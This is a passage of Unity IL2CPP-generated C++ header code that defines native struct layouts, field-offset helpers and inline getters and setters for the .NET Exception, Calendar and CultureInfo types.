const { return ____innerException_4; } inline Exception_t ** get_address_of__innerException_4() { return &____innerException_4; } inline void set__innerException_4(Exception_t * value) { ____innerException_4 = value; Il2CppCodeGenWriteBarrier((&____innerException_4), value); } inline static int32_t get_offset_of__helpURL_5() { return static_cast<int32_t>(offsetof(Exception_t, ____helpURL_5)); } inline String_t* get__helpURL_5() const { return ____helpURL_5; } inline String_t** get_address_of__helpURL_5() { return &____helpURL_5; } inline void set__helpURL_5(String_t* value) { ____helpURL_5 = value; Il2CppCodeGenWriteBarrier((&____helpURL_5), value); } inline static int32_t get_offset_of__stackTrace_6() { return static_cast<int32_t>(offsetof(Exception_t, ____stackTrace_6)); } inline RuntimeObject * get__stackTrace_6() const { return ____stackTrace_6; } inline RuntimeObject ** get_address_of__stackTrace_6() { return &____stackTrace_6; } inline void set__stackTrace_6(RuntimeObject * value) { ____stackTrace_6 = value; Il2CppCodeGenWriteBarrier((&____stackTrace_6), value); } inline static int32_t get_offset_of__stackTraceString_7() { return static_cast<int32_t>(offsetof(Exception_t, ____stackTraceString_7)); } inline String_t* get__stackTraceString_7() const { return ____stackTraceString_7; } inline String_t** get_address_of__stackTraceString_7() { return &____stackTraceString_7; } inline void set__stackTraceString_7(String_t* value) { ____stackTraceString_7 = value; Il2CppCodeGenWriteBarrier((&____stackTraceString_7), value); } inline static int32_t get_offset_of__remoteStackTraceString_8() { return static_cast<int32_t>(offsetof(Exception_t, ____remoteStackTraceString_8)); } inline String_t* get__remoteStackTraceString_8() const { return ____remoteStackTraceString_8; } inline String_t** get_address_of__remoteStackTraceString_8() { return &____remoteStackTraceString_8; } inline void set__remoteStackTraceString_8(String_t* value) { ____remoteStackTraceString_8 = value; Il2CppCodeGenWriteBarrier((&____remoteStackTraceString_8), value); } inline static int32_t get_offset_of__remoteStackIndex_9() { return static_cast<int32_t>(offsetof(Exception_t, ____remoteStackIndex_9)); } inline int32_t get__remoteStackIndex_9() const { return ____remoteStackIndex_9; } inline int32_t* get_address_of__remoteStackIndex_9() { return &____remoteStackIndex_9; } inline void set__remoteStackIndex_9(int32_t value) { ____remoteStackIndex_9 = value; } inline static int32_t get_offset_of__dynamicMethods_10() { return static_cast<int32_t>(offsetof(Exception_t, ____dynamicMethods_10)); } inline RuntimeObject * get__dynamicMethods_10() const { return ____dynamicMethods_10; } inline RuntimeObject ** get_address_of__dynamicMethods_10() { return &____dynamicMethods_10; } inline void set__dynamicMethods_10(RuntimeObject * value) { ____dynamicMethods_10 = value; Il2CppCodeGenWriteBarrier((&____dynamicMethods_10), value); } inline static int32_t get_offset_of__HResult_11() { return static_cast<int32_t>(offsetof(Exception_t, ____HResult_11)); } inline int32_t get__HResult_11() const { return ____HResult_11; } inline int32_t* get_address_of__HResult_11() { return &____HResult_11; } inline void set__HResult_11(int32_t value) { ____HResult_11 = value; } inline static int32_t get_offset_of__source_12() { return static_cast<int32_t>(offsetof(Exception_t, ____source_12)); } inline String_t* get__source_12() const { return ____source_12; } inline String_t** get_address_of__source_12() { return &____source_12; } inline void set__source_12(String_t* value) { ____source_12 = value; Il2CppCodeGenWriteBarrier((&____source_12), value); } inline static int32_t get_offset_of__safeSerializationManager_13() { return static_cast<int32_t>(offsetof(Exception_t, ____safeSerializationManager_13)); } inline SafeSerializationManager_t4A754D86B0F784B18CBC36C073BA564BED109770 * get__safeSerializationManager_13() const { return ____safeSerializationManager_13; } inline SafeSerializationManager_t4A754D86B0F784B18CBC36C073BA564BED109770 ** get_address_of__safeSerializationManager_13() { return &____safeSerializationManager_13; } inline void set__safeSerializationManager_13(SafeSerializationManager_t4A754D86B0F784B18CBC36C073BA564BED109770 * value) { ____safeSerializationManager_13 = value; Il2CppCodeGenWriteBarrier((&____safeSerializationManager_13), value); } inline static int32_t get_offset_of_captured_traces_14() { return static_cast<int32_t>(offsetof(Exception_t, ___captured_traces_14)); } inline StackTraceU5BU5D_t855F09649EA34DEE7C1B6F088E0538E3CCC3F196* get_captured_traces_14() const { return ___captured_traces_14; } inline StackTraceU5BU5D_t855F09649EA34DEE7C1B6F088E0538E3CCC3F196** get_address_of_captured_traces_14() { return &___captured_traces_14; } inline void set_captured_traces_14(StackTraceU5BU5D_t855F09649EA34DEE7C1B6F088E0538E3CCC3F196* value) { ___captured_traces_14 = value; Il2CppCodeGenWriteBarrier((&___captured_traces_14), value); } inline static int32_t get_offset_of_native_trace_ips_15() { return static_cast<int32_t>(offsetof(Exception_t, ___native_trace_ips_15)); } inline IntPtrU5BU5D_t4DC01DCB9A6DF6C9792A6513595D7A11E637DCDD* get_native_trace_ips_15() const { return ___native_trace_ips_15; } inline IntPtrU5BU5D_t4DC01DCB9A6DF6C9792A6513595D7A11E637DCDD** get_address_of_native_trace_ips_15() { return &___native_trace_ips_15; } inline void set_native_trace_ips_15(IntPtrU5BU5D_t4DC01DCB9A6DF6C9792A6513595D7A11E637DCDD* value) { ___native_trace_ips_15 = value; Il2CppCodeGenWriteBarrier((&___native_trace_ips_15), value); } }; struct Exception_t_StaticFields { public: // System.Object System.Exception::s_EDILock RuntimeObject * ___s_EDILock_0; public: inline static int32_t get_offset_of_s_EDILock_0() { return static_cast<int32_t>(offsetof(Exception_t_StaticFields, ___s_EDILock_0)); } inline RuntimeObject * get_s_EDILock_0() const { return ___s_EDILock_0; } inline RuntimeObject ** get_address_of_s_EDILock_0() { return &___s_EDILock_0; } inline void set_s_EDILock_0(RuntimeObject * value) { ___s_EDILock_0 = value; Il2CppCodeGenWriteBarrier((&___s_EDILock_0), value); } }; #ifdef __clang__ #pragma clang diagnostic pop #endif // Native definition for P/Invoke marshalling of System.Exception struct Exception_t_marshaled_pinvoke { char* ____className_1; char* ____message_2; RuntimeObject* ____data_3; Exception_t_marshaled_pinvoke* ____innerException_4; char* ____helpURL_5; Il2CppIUnknown* ____stackTrace_6; char* ____stackTraceString_7; char* ____remoteStackTraceString_8; int32_t ____remoteStackIndex_9; Il2CppIUnknown* ____dynamicMethods_10; int32_t ____HResult_11; char* ____source_12; SafeSerializationManager_t4A754D86B0F784B18CBC36C073BA564BED109770 * ____safeSerializationManager_13; StackTraceU5BU5D_t855F09649EA34DEE7C1B6F088E0538E3CCC3F196* ___captured_traces_14; intptr_t* ___native_trace_ips_15; }; // Native definition for COM marshalling of System.Exception struct Exception_t_marshaled_com { Il2CppChar* ____className_1; Il2CppChar* ____message_2; RuntimeObject* ____data_3; Exception_t_marshaled_com* ____innerException_4; Il2CppChar* ____helpURL_5; Il2CppIUnknown* ____stackTrace_6; Il2CppChar* ____stackTraceString_7; Il2CppChar* ____remoteStackTraceString_8; int32_t ____remoteStackIndex_9; Il2CppIUnknown* ____dynamicMethods_10; int32_t ____HResult_11; Il2CppChar* ____source_12; SafeSerializationManager_t4A754D86B0F784B18CBC36C073BA564BED109770 * ____safeSerializationManager_13; StackTraceU5BU5D_t855F09649EA34DEE7C1B6F088E0538E3CCC3F196* ___captured_traces_14; intptr_t* ___native_trace_ips_15; }; #endif // EXCEPTION_T_H #ifndef CALENDAR_TF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5_H #define CALENDAR_TF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Globalization.Calendar struct Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 : public RuntimeObject { public: // System.Int32 System.Globalization.Calendar::m_currentEraValue int32_t ___m_currentEraValue_0; // System.Boolean System.Globalization.Calendar::m_isReadOnly bool ___m_isReadOnly_1; // System.Int32 System.Globalization.Calendar::twoDigitYearMax int32_t ___twoDigitYearMax_2; public: inline static int32_t get_offset_of_m_currentEraValue_0() { return static_cast<int32_t>(offsetof(Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5, ___m_currentEraValue_0)); } inline int32_t get_m_currentEraValue_0() const { return ___m_currentEraValue_0; } inline int32_t* get_address_of_m_currentEraValue_0() { return &___m_currentEraValue_0; } inline void set_m_currentEraValue_0(int32_t value) { ___m_currentEraValue_0 = value; } inline static int32_t get_offset_of_m_isReadOnly_1() { return static_cast<int32_t>(offsetof(Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5, ___m_isReadOnly_1)); } inline bool get_m_isReadOnly_1() const { return ___m_isReadOnly_1; } inline bool* get_address_of_m_isReadOnly_1() { return &___m_isReadOnly_1; } inline void set_m_isReadOnly_1(bool value) { ___m_isReadOnly_1 = value; } inline static int32_t get_offset_of_twoDigitYearMax_2() { return static_cast<int32_t>(offsetof(Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5, ___twoDigitYearMax_2)); } inline int32_t get_twoDigitYearMax_2() const { return ___twoDigitYearMax_2; } inline int32_t* get_address_of_twoDigitYearMax_2() { return &___twoDigitYearMax_2; } inline void set_twoDigitYearMax_2(int32_t value) { ___twoDigitYearMax_2 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // CALENDAR_TF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5_H #ifndef CULTUREINFO_T345AC6924134F039ED9A11F3E03F8E91B6A3225F_H #define CULTUREINFO_T345AC6924134F039ED9A11F3E03F8E91B6A3225F_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Globalization.CultureInfo struct CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F : public RuntimeObject { public: // System.Boolean System.Globalization.CultureInfo::m_isReadOnly bool ___m_isReadOnly_3; // System.Int32 System.Globalization.CultureInfo::cultureID int32_t ___cultureID_4; // System.Int32 System.Globalization.CultureInfo::parent_lcid int32_t ___parent_lcid_5; // System.Int32 System.Globalization.CultureInfo::datetime_index int32_t ___datetime_index_6; // System.Int32 System.Globalization.CultureInfo::number_index int32_t ___number_index_7; // System.Int32 System.Globalization.CultureInfo::default_calendar_type int32_t ___default_calendar_type_8; // System.Boolean System.Globalization.CultureInfo::m_useUserOverride bool ___m_useUserOverride_9; // System.Globalization.NumberFormatInfo modreq(System.Runtime.CompilerServices.IsVolatile) System.Globalization.CultureInfo::numInfo NumberFormatInfo_tFDF57037EBC5BC833D0A53EF0327B805994860A8 * ___numInfo_10; // System.Globalization.DateTimeFormatInfo modreq(System.Runtime.CompilerServices.IsVolatile) System.Globalization.CultureInfo::dateTimeInfo DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dateTimeInfo_11; // System.Globalization.TextInfo modreq(System.Runtime.CompilerServices.IsVolatile) System.Globalization.CultureInfo::textInfo TextInfo_t5F1E697CB6A7E5EC80F0DC3A968B9B4A70C291D8 * ___textInfo_12; // System.String System.Globalization.CultureInfo::m_name String_t* ___m_name_13; // System.String System.Globalization.CultureInfo::englishname String_t* ___englishname_14; // System.String System.Globalization.CultureInfo::nativename String_t* ___nativename_15; // System.String System.Globalization.CultureInfo::iso3lang String_t* ___iso3lang_16; // System.String System.Globalization.CultureInfo::iso2lang String_t* ___iso2lang_17; // System.String System.Globalization.CultureInfo::win3lang String_t* ___win3lang_18; // System.String System.Globalization.CultureInfo::territory String_t* ___territory_19; // System.String[] System.Globalization.CultureInfo::native_calendar_names StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* ___native_calendar_names_20; // System.Globalization.CompareInfo modreq(System.Runtime.CompilerServices.IsVolatile) System.Globalization.CultureInfo::compareInfo CompareInfo_tB9A071DBC11AC00AF2EA2066D0C2AE1DCB1865D1 * ___compareInfo_21; // System.Void* System.Globalization.CultureInfo::textinfo_data void* ___textinfo_data_22; // System.Int32 System.Globalization.CultureInfo::m_dataItem int32_t ___m_dataItem_23; // System.Globalization.Calendar System.Globalization.CultureInfo::calendar Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * ___calendar_24; // System.Globalization.CultureInfo System.Globalization.CultureInfo::parent_culture CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F * ___parent_culture_25; // System.Boolean System.Globalization.CultureInfo::constructed bool ___constructed_26; // System.Byte[] System.Globalization.CultureInfo::cached_serialized_form ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821* ___cached_serialized_form_27; // System.Globalization.CultureData System.Globalization.CultureInfo::m_cultureData CultureData_tF43B080FFA6EB278F4F289BCDA3FB74B6C208ECD * ___m_cultureData_28; // System.Boolean System.Globalization.CultureInfo::m_isInherited bool ___m_isInherited_29; public: inline static int32_t get_offset_of_m_isReadOnly_3() { return static_cast<int32_t>(offsetof(CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F, ___m_isReadOnly_3)); } inline bool get_m_isReadOnly_3() const { return ___m_isReadOnly_3; } inline bool* get_address_of_m_isReadOnly_3() { return &___m_isReadOnly_3; } inline void set_m_isReadOnly_3(bool value) { ___m_isReadOnly_3 = value; } inline static int32_t get_offset_of_cultureID_4() { return static_cast<int32_t>(offsetof(CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F, ___cultureID_4)); } inline int32_t get_cultureID_4() const { return ___cultureID_4; } inline int32_t* get_address_of_cultureID_4() { return &___cultureID_4; } inline void set_cultureID_4(int32_t value) { ___cultureID_4 = value; } inline static int32_t get_offset_of_parent_lcid_5() { return static_cast<int32_t>(offsetof(CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F, ___parent_lcid_5)); } inline int32_t get_parent_lcid_5() const { return ___parent_lcid_5; } inline int32_t* get_address_of_parent_lcid_5() { return &___parent_lcid_5; } inline void set_parent_lcid_5(int32_t value) { ___parent_lcid_5 = value; } inline static int32_t get_offset_of_datetime_index_6() { return static_cast<int32_t>(offsetof(CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F, ___datetime_index_6)); } inline int32_t get_datetime_index_6() const { return ___datetime_index_6; } inline int32_t* get_address_of_datetime_index_6() { return &___datetime_index_6; } inline void set_datetime_index_6(int32_t value) { ___datetime_index_6 = value; } inline static int32_t get_offset_of_number_index_7() { return static_cast<int32_t>(offsetof(CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F, ___number_index_7)); } inline int32_t get_number_index_7() const { return ___number_index_7; } inline int32_t* get_address_of_number_index_7() { return &___number_index_7; } inline void set_number_index_7(int32_t value) { ___number_index_7 = value; } inline static int32_t get_offset_of_default_calendar_type_8() { return static_cast<int32_t>(offsetof(CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F, ___default_calendar_type_8)); } inline int32_t get_default_calendar_type_8() const { return ___default_calendar_type_8; } inline int32_t* get_address_of_default_calendar_type_8() { return &___default_calendar_type_8; } inline void set_default_calendar_type_8(int32_t value) { ___default_calendar_type_8 = value; } inline static int32_t get_offset_of_m_useUserOverride_9() { return static_cast<int32_t>(offsetof(CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F, ___m_useUserOverride_9)); } inline bool get_m_useUserOverride_9() const { return ___m_useUserOverride_9; } inline bool* get_address_of_m_useUserOverride_9() { return &___m_useUserOverride_9; } inline void set_m_useUserOverride_9(bool value) { ___m_useUserOverride_9 = value; } inline static int32_t get_offset_of_numInfo_10() { return static_cast<int32_t>(offsetof(CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F, ___numInfo_10)); } inline NumberFormatInfo_tFDF57037EBC5BC833D0A53EF0327B805994860A8 * get_numInfo_10() const { return ___numInfo_10; } inline NumberFormatInfo_tFDF57037EBC5BC833D0A53EF0327B805994860A8 ** get_address_of_numInfo_10() { return &___numInfo_10; } inline void set_numInfo_10(NumberFormatInfo_tFDF57037EBC5BC833D0A53EF0327B805994860A8 * value) { ___numInfo_10 = value; Il2CppCodeGenWriteBarrier((&___numInfo_10), value); } inline static int32_t get_offset_of_dateTimeInfo_11() { return static_cast<int32_t>(offsetof(CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F, ___dateTimeInfo_11)); } inline DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * get_dateTimeInfo_11() const { return ___dateTimeInfo_11; } inline DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F ** get_address_of_dateTimeInfo_11() { return &___dateTimeInfo_11; } inline void set_dateTimeInfo_11(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * value) { ___dateTimeInfo_11 = value; Il2CppCodeGenWriteBarrier((&___dateTimeInfo_11), value); } inline static int32_t get_offset_of_textInfo_12() { return static_cast<int32_t>(offsetof(CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F, ___textInfo_12)); } inline TextInfo_t5F1E697CB6A7E5EC80F0DC3A968B9B4A70C291D8 * get_textInfo_12() const { return ___textInfo_12; } inline TextInfo_t5F1E697CB6A7E5EC80F0DC3A968B9B4A70C291D8 ** get_address_of_textInfo_12() { return &___textInfo_12; } inline void set_textInfo_12(TextInfo_t5F1E697CB6A7E5EC80F0DC3A968B9B4A70C291D8 * value) { ___textInfo_12 = value; Il2CppCodeGenWriteBarrier((&___textInfo_12), value); } inline static int32_t get_offset_of_m_name_13() { return static_cast<int32_t>(offsetof(CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F, ___m_name_13)); } inline String_t* get_m_name_13() const { return ___m_name_13; } inline String_t** get_address_of_m_name_13() { return &___m_name_13; } inline void set_m_name_13(String_t* value) { ___m_name_13 = value; Il2CppCodeGenWriteBarrier((&___m_name_13), value); } inline static int32_t get_offset_of_englishname_14() { return static_cast<int32_t>(offsetof(CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F, ___englishname_14)); } inline String_t* get_englishname_14() const { return ___englishname_14; } inline String_t** get_address_of_englishname_14() { return &___englishname_14; } inline void set_englishname_14(String_t* value) { ___englishname_14 = value; Il2CppCodeGenWriteBarrier((&___englishname_14), value); } inline static int32_t get_offset_of_nativename_15() { return static_cast<int32_t>(offsetof(CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F, ___nativename_15)); } inline String_t* get_nativename_15() const { return ___nativename_15; } inline String_t** get_address_of_nativename_15() { return &___nativename_15; } inline void set_nativename_15(String_t* value) { ___nativename_15 = value; Il2CppCodeGenWriteBarrier((&___nativename_15), value); } inline static int32_t get_offset_of_iso3lang_16() { return static_cast<int32_t>(offsetof(CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F, ___iso3lang_16)); } inline String_t* get_iso3lang_16() const { return ___iso3lang_16; } inline String_t** get_address_of_iso3lang_16() { return &___iso3lang_16; } inline void set_iso3lang_16(String_t* value) { ___iso3lang_16 = value; Il2CppCodeGenWriteBarrier((&___iso3lang_16), value); } inline static int32_t get_offset_of_iso2lang_17() { return static_cast<int32_t>(offsetof(CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F, ___iso2lang_17)); } inline String_t* get_iso2lang_17() const { return ___iso2lang_17; } inline String_t** get_address_of_iso2lang_17() { return &___iso2lang_17; } inline void set_iso2lang_17(String_t* value) { ___iso2lang_17 = value; Il2CppCodeGenWriteBarrier((&___iso2lang_17), value); } inline static int32_t get_offset_of_win3lang_18() { return static_cast<int32_t>(offsetof(CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F, ___win3lang_18)); } inline String_t* get_win3lang_18() const { return ___win3lang_18; } inline String_t** get_address_of_win3lang_18() { return &___win3lang_18; } inline void set_win3lang_18(String_t* value) { ___win3lang_18 = value; Il2CppCodeGenWriteBarrier((&___win3lang_18), value); } inline static int32_t get_offset_of_territory_19() { return static_cast<int32_t>(offsetof(CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F, ___territory_19)); } inline String_t* get_territory_19() const { return ___territory_19; } inline String_t** get_address_of_territory_19() { return &___territory_19; } inline void set_territory_19(String_t* value) { ___territory_19 = value; Il2CppCodeGenWriteBarrier((&___territory_19), value); } inline static int32_t get_offset_of_native_calendar_names_20() { return static_cast<int32_t>(offsetof(CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F, ___native_calendar_names_20)); } inline StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* get_native_calendar_names_20() const { return ___native_calendar_names_20; } inline StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E** get_address_of_native_calendar_names_20() { return &___native_calendar_names_20; } inline void set_native_calendar_names_20(StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* value) { ___native_calendar_names_20 = value; Il2CppCodeGenWriteBarrier((&___native_calendar_names_20), value); } inline static int32_t get_offset_of_compareInfo_21() { return static_cast<int32_t>(offsetof(CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F, ___compareInfo_21)); } inline CompareInfo_tB9A071DBC11AC00AF2EA2066D0C2AE1DCB1865D1 * get_compareInfo_21() const { return ___compareInfo_21; } inline CompareInfo_tB9A071DBC11AC00AF2EA2066D0C2AE1DCB1865D1 ** get_address_of_compareInfo_21() { return &___compareInfo_21; } inline void set_compareInfo_21(CompareInfo_tB9A071DBC11AC00AF2EA2066D0C2AE1DCB1865D1 * value) { ___compareInfo_21 = value; Il2CppCodeGenWriteBarrier((&___compareInfo_21), value); } inline static int32_t get_offset_of_textinfo_data_22() { return static_cast<int32_t>(offsetof(CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F, ___textinfo_data_22)); } inline void* get_textinfo_data_22() const { return ___textinfo_data_22; } inline void** get_address_of_textinfo_data_22() { return &___textinfo_data_22; } inline void set_textinfo_data_22(void* value) { ___textinfo_data_22 = value; } inline static int32_t get_offset_of_m_dataItem_23() { return static_cast<int32_t>(offsetof(CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F, ___m_dataItem_23)); } inline int32_t get_m_dataItem_23() const { return ___m_dataItem_23; } inline int32_t* get_address_of_m_dataItem_23() { return &___m_dataItem_23; } inline void set_m_dataItem_23(int32_t value) { ___m_dataItem_23 = value; } inline static int32_t get_offset_of_calendar_24() { return static_cast<int32_t>(offsetof(CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F, ___calendar_24)); } inline Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * get_calendar_24() const { return ___calendar_24; } inline Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 ** get_address_of_calendar_24() { return &___calendar_24; } inline void set_calendar_24(Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * value) { ___calendar_24 = value; Il2CppCodeGenWriteBarrier((&___calendar_24), value); } inline static int32_t get_offset_of_parent_culture_25() { return static_cast<int32_t>(offsetof(CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F, ___parent_culture_25)); } inline CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F * get_parent_culture_25() const { return ___parent_culture_25; } inline CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F ** get_address_of_parent_culture_25() { return &___parent_culture_25; } inline void set_parent_culture_25(CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F * value) { ___parent_culture_25 = value; Il2CppCodeGenWriteBarrier((&___parent_culture_25), value); } inline static int32_t get_offset_of_constructed_26() { return static_cast<int32_t>(offsetof(CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F, ___constructed_26)); } inline bool get_constructed_26() const { return ___constructed_26; } inline bool* get_address_of_constructed_26() { return &___constructed_26; } inline void set_constructed_26(bool value) { ___constructed_26 = value; } inline static int32_t get_offset_of_cached_serialized_form_27() { return static_cast<int32_t>(offsetof(CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F, ___cached_serialized_form_27)); } inline ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821* get_cached_serialized_form_27() const { return ___cached_serialized_form_27; } inline ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821** get_address_of_cached_serialized_form_27() { return &___cached_serialized_form_27; } inline void set_cached_serialized_form_27(ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821* value) { ___cached_serialized_form_27 = value; Il2CppCodeGenWriteBarrier((&___cached_serialized_form_27), value); } inline static int32_t get_offset_of_m_cultureData_28() { return static_cast<int32_t>(offsetof(CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F, ___m_cultureData_28)); } inline CultureData_tF43B080FFA6EB278F4F289BCDA3FB74B6C208ECD * get_m_cultureData_28() const { return ___m_cultureData_28; } inline CultureData_tF43B080FFA6EB278F4F289BCDA3FB74B6C208ECD ** get_address_of_m_cultureData_28() { return &___m_cultureData_28; } inline void set_m_cultureData_28(CultureData_tF43B080FFA6EB278F4F289BCDA3FB74B6C208ECD * value) { ___m_cultureData_28 = value; Il2CppCodeGenWriteBarrier((&___m_cultureData_28), value); } inline static int32_t get_offset_of_m_isInherited_29() { return static_cast<int32_t>(offsetof(CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F, ___m_isInherited_29)); } inline bool get_m_isInherited_29() const { return ___m_isInherited_29; } inline bool* get_address_of_m_isInherited_29() { return &___m_isInherited_29; } inline void set_m_isInherited_29(bool value) { ___m_isInherited_29 = value; } }; struct CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F_StaticFields { public: // System.Globalization.CultureInfo modreq(System.Runtime.CompilerServices.IsVolatile) System.Globalization.CultureInfo::invariant_culture_info CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F * ___invariant_culture_info_0; // System.Object System.Globalization.CultureInfo::shared_table_lock RuntimeObject * ___shared_table_lock_1; // System.Globalization.CultureInfo System.Globalization.CultureInfo::default_current_culture CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F * ___default_current_culture_2; // System.Globalization.CultureInfo modreq(System.Runtime.CompilerServices.IsVolatile) System.Globalization.CultureInfo::s_DefaultThreadCurrentUICulture CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F * ___s_DefaultThreadCurrentUICulture_33; // System.Globalization.CultureInfo modreq(System.Runtime.CompilerServices.IsVolatile) System.Globalization.CultureInfo::s_DefaultThreadCurrentCulture CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F * ___s_DefaultThreadCurrentCulture_34; // System.Collections.Generic.Dictionary`2<System.Int32,System.Globalization.CultureInfo> System.Globalization.CultureInfo::shared_by_number Dictionary_2_tC88A56872F7C79DBB9582D4F3FC22ED5D8E0B98B * ___shared_by_number_35; // System.Collections.Generic.Dictionary`2<System.String,System.Globalization.CultureInfo> System.Globalization.CultureInfo::shared_by_name Dictionary_2_tBA5388DBB42BF620266F9A48E8B859BBBB224E25 * ___shared_by_name_36; // System.Boolean System.Globalization.CultureInfo::IsTaiwanSku bool ___IsTaiwanSku_37; public: inline static int32_t get_offset_of_invariant_culture_info_0() { return static_cast<int32_t>(offsetof(CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F_StaticFields, ___invariant_culture_info_0)); } inline CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F * get_invariant_culture_info_0() const { return ___invariant_culture_info_0; } inline CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F ** get_address_of_invariant_culture_info_0() { return &___invariant_culture_info_0; } inline void set_invariant_culture_info_0(CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F * value) { ___invariant_culture_info_0 = value; Il2CppCodeGenWriteBarrier((&___invariant_culture_info_0), value); } inline static int32_t get_offset_of_shared_table_lock_1() { return static_cast<int32_t>(offsetof(CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F_StaticFields, ___shared_table_lock_1)); } inline RuntimeObject * get_shared_table_lock_1() const { return ___shared_table_lock_1; } inline RuntimeObject ** get_address_of_shared_table_lock_1() { return &___shared_table_lock_1; } inline void set_shared_table_lock_1(RuntimeObject * value) { ___shared_table_lock_1 = value; Il2CppCodeGenWriteBarrier((&___shared_table_lock_1), value); } inline static int32_t get_offset_of_default_current_culture_2() { return static_cast<int32_t>(offsetof(CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F_StaticFields, ___default_current_culture_2)); } inline CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F * get_default_current_culture_2() const { return ___default_current_culture_2; } inline CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F ** get_address_of_default_current_culture_2() { return &___default_current_culture_2; } inline void set_default_current_culture_2(CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F * value) { ___default_current_culture_2 = value; Il2CppCodeGenWriteBarrier((&___default_current_culture_2), value); } inline static int32_t get_offset_of_s_DefaultThreadCurrentUICulture_33() { return static_cast<int32_t>(offsetof(CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F_StaticFields, ___s_DefaultThreadCurrentUICulture_33)); } inline CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F * get_s_DefaultThreadCurrentUICulture_33() const { return ___s_DefaultThreadCurrentUICulture_33; } inline CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F ** get_address_of_s_DefaultThreadCurrentUICulture_33() { return &___s_DefaultThreadCurrentUICulture_33; } inline void set_s_DefaultThreadCurrentUICulture_33(CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F * value) { ___s_DefaultThreadCurrentUICulture_33 = value; Il2CppCodeGenWriteBarrier((&___s_DefaultThreadCurrentUICulture_33), value); } inline static int32_t get_offset_of_s_DefaultThreadCurrentCulture_34() { return static_cast<int32_t>(offsetof(CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F_StaticFields, ___s_DefaultThreadCurrentCulture_34)); } 